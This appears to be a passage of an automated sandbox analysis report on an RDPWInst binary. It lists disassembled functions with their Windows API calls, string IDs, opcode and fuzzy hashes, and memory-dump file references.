                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 1646373207-3689287502
                                                    • Opcode ID: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                    • Instruction ID: 7cbe884eb00d1b8f8e0b90a93abb1152f64afda344a6e4615680911855581588
                                                    • Opcode Fuzzy Hash: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                    • Instruction Fuzzy Hash: D4E012513883C21AD61276FA1DD2B2E26CC4B6D709F2C287FB5C0D1193D99DC468863F
                                                    Function 0043A724 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443E55,000001F4,000001F4,000003E8,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A72F
                                                      • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 1646373207-1355242751
                                                    • Opcode ID: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                    • Instruction ID: 7f98099b70b18dc0c665e624c368f4c8ddeaec672eef30118536404a03429535
                                                    • Opcode Fuzzy Hash: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                    • Instruction Fuzzy Hash: FBE0C2013883C21EE60272F90DD1B3A17D84B6C308F24183FB1C0D1183DB9CC524862F
                                                    Function 00415B40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
                                                      • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                    • API String ID: 1646373207-1127948838
                                                    • Opcode ID: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                    • Instruction ID: 4ad585b0bbb22d8cb86f0bca7bf1fd5c676b9542b5302fef9f3b12a8682de55f
                                                    • Opcode Fuzzy Hash: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                    • Instruction Fuzzy Hash: 92D0C7B4745F85DBFF10DBA55D83BD62254E785309B10043B70046D2D3D67C6894CB1D